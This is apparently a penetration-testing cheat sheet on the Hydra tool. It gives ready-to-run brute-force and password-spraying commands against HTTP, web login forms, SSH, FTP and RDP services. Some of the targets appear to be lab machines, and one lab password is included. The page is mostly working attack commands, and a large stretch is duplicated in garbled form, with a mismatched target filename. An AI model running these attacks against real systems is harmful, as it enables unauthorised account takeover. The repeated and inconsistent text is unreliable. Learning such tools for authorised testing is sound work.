HYDRA

INSTALLATION

root@oco:~$ sudo apt update
root@oco:~$ sudo apt search hydra
root@oco:~$ sudo apt install hydra

BASIC USAGE

root@oco:~$ hydra -h
 hydra [login_options] [password_options] [attack_options] [service_options]

SERVICES

services define the specific protocols or services that Hydra can target. each service is contained in a module. each module is designed to understand a particular protocol's communication patterns and authentication requirements, allowing Hydra to send appropriate login requests and interpret the responses.

BRUTE FORCE: HTTP AUTHENTICATION

root@oco:~$ nano usernames.txt
 ...
 admin
root@oco:~$ nano passwords.txt
 ...
 password
root@oco:~$ hydra -L usernames.txt -P passwords.txt www.example.com http-get

BRUTE FORCE: MULTIPLE SSH SERVERS

root@oco:~$ nano sshTargets.txt
 ...
 10.10.10.5
root@oco:~$ hydra -l root -p toor -M targets.txt ssh
 * Hydra will execute parallel brute-force attempts on each server, significantly speeding up the process

BRUTE FORCE: FTP ON NON-STANDARD PORT

root@oco:~$ nano usernames.txt
 ...
 admin
root@oco:~$ nano passwords.txt
 ...
 password

root@oco:~$ hydra -L usernames.txt -P passwords.txt -s 2121 -V ftp.example.com ftp
 * the -s is used to specify a non-standard port

root@oco:~$ nano passwords.txt
 ...
 password
 
root@oco:~$ hydra -l admin -P passwords.txt www.example.com http-post-form "/login:user=^USER^&pass=^PASS^:S=302"
 * the user=^USER^&pass=^PASS^ represents the form parameter
    - the specific format can be retrieved via Burp Suite or through the Browser's dev tools
    - the S=302 is used to look for a successful login indicated by the HTTP status code 302
       - Looking for a successful login indicated by the HTTP status code 302 is 
         necessary because, in many web applications, successful authentication 
         does not directly return a 200 OK response. Instead, it often redirects 
         the user to a different page after login, which is signified by 
         the 302 Found status code.

hydra -L allowed.userlist -P allowed.userlist.passwd 10.129.1.15 http-post-form "/login.php:username=^USER^&password=^PASS^:F=Warning! Incorrect information."

#Invalid username or password
hydra -L top-usernames-shortlist.txt -P 500-worst-passwords.txt 10.129.223.232 -s 8080 http-post-form "/j_spring_security_check:j_username=^USER^&j_password=^PASS&:F=Invalid username or password"

BRUTE FORCE: RDP (ADVANCED)

root@oco:~$ hydra -l administrator -x 6:8:abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 192.168.1.100 rdp
 * the -x 6:8:abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 represents a password consisting of 6 to 8 characters, including lowercase letters, uppercase letters, and numbers
    - this generates and test passwords ranging from 6 to 8 characters, using the specified character set.
 * Hydra will generate and test all possible password combinations within the specified parameters, attempting to break into the RDP service.

PASSWORD SPRAYING

this attack uses the same password against many users before another password is attempted. this method may prevent account lockouts due to too many incorrect login attempts

root@oco:~$ cat > usernames.txt
 optimus
 albert
 andreas
 christine
 maria
 root
 
 CTRL+C

root@oco:~$ hydra -L usernames.txt -p 'funnel123#!#' {target_IP} ssh

PreviousBRUTE FORCE (ONLINE)NextMEDUSA

Last updated 1 month ago

SERVICES

root@oco:~$ nano sshTargets.txt ... 10.10.10.5 root@oco:~$ hydra -l root -p toor -M targets.txt ssh * Hydra will execute parallel brute-force attempts on each server, significantly speeding up the process

root@oco:~$ nano usernames.txt ... admin root@oco:~$ nano passwords.txt ... password root@oco:~$ hydra -L usernames.txt -P passwords.txt -s 2121 -V ftp.example.com ftp * the -s is used to specify a non-standard port

BRUTE FORCE: WEB LOGIN FORMS - SUCCESSFUL REDIRECTS

root@oco:~$ nano passwords.txt
 ...
 password
 
root@oco:~$ hydra -l admin -P passwords.txt www.example.com http-post-form "/login:user=^USER^&pass=^PASS^:S=302"
 * the user=^USER^&pass=^PASS^ represents the form parameter
    - the specific format can be retrieved via Burp Suite or through the Browser's dev tools
    - the S=302 is used to look for a successful login indicated by the HTTP status code 302
       - Looking for a successful login indicated by the HTTP status code 302 is 
         necessary because, in many web applications, successful authentication 
         does not directly return a 200 OK response. Instead, it often redirects 
         the user to a different page after login, which is signified by 
         the 302 Found status code.

BRUTE FORCE: WEB LOGIN FORMS - FAILURE ERRORS

hydra -L allowed.userlist -P allowed.userlist.passwd 10.129.1.15 http-post-form "/login.php:username=^USER^&password=^PASS^:F=Warning! Incorrect information."

#Invalid username or password
hydra -L top-usernames-shortlist.txt -P 500-worst-passwords.txt 10.129.223.232 -s 8080 http-post-form "/j_spring_security_check:j_username=^USER^&j_password=^PASS&:F=Invalid username or password"

BRUTE FORCE: RDP (ADVANCED)

root@oco:~$ hydra -l administrator -x 6:8:abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 192.168.1.100 rdp
 * the -x 6:8:abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 represents a password consisting of 6 to 8 characters, including lowercase letters, uppercase letters, and numbers
    - this generates and test passwords ranging from 6 to 8 characters, using the specified character set.
 * Hydra will generate and test all possible password combinations within the specified parameters, attempting to break into the RDP service.

PASSWORD SPRAYING

this attack uses the same password against many users before another password is attempted. this method may prevent account lockouts due to too many incorrect login attempts

root@oco:~$ cat > usernames.txt
 optimus
 albert
 andreas
 christine
 maria
 root
 
 CTRL+C

root@oco:~$ hydra -L usernames.txt -p 'funnel123#!#' {target_IP} ssh